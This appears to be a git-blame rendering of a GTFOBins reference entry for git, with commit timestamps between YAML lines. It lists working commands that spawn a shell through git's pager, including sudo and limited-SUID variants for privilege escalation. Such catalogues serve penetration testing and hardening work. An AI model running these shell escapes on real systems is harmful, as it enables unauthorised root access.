2018-07-22 15:06:54 +02:00
---
functions:
2018-10-05 19:55:38 +02:00
shell:
2018-09-07 01:00:01 +02:00
- code: PAGER='sh -c "exec sh 0<& 1"' git -p help
2019-03-31 12:03:34 +02:00
- description: This invokes the default pager, which is likely to be [`less` ](/gtfobins/less/ ), other functions may apply.
code: |
2019-06-23 17:16:13 +02:00
git help config
2019-03-31 12:03:34 +02:00
!/bin/sh
2018-10-05 19:55:38 +02:00
sudo:
2018-09-07 01:00:01 +02:00
- code: PAGER='sh -c "exec sh 0<& 1"' sudo -E git -p help
2019-07-08 18:59:40 +02:00
- description: This invokes the default pager, which is likely to be [`less` ](/gtfobins/less/ ), other functions may apply.
2019-03-31 12:03:34 +02:00
code: |
2019-07-08 18:59:40 +02:00
sudo git -p help config
2019-03-31 12:03:34 +02:00
!/bin/sh
2019-10-25 14:19:18 +02:00
- description: The help system can also be reached from any `git` command, e.g., `git branch` . This invokes the default pager, which is likely to be [`less` ](/gtfobins/less/ ), other functions may apply.
code: |
sudo git branch --help config
!/bin/sh
2018-10-05 19:55:38 +02:00
limited-suid:
2018-09-07 01:00:01 +02:00
- code: PAGER='sh -c "exec sh 0<& 1"' ./git -p help
2018-07-22 15:06:54 +02:00
---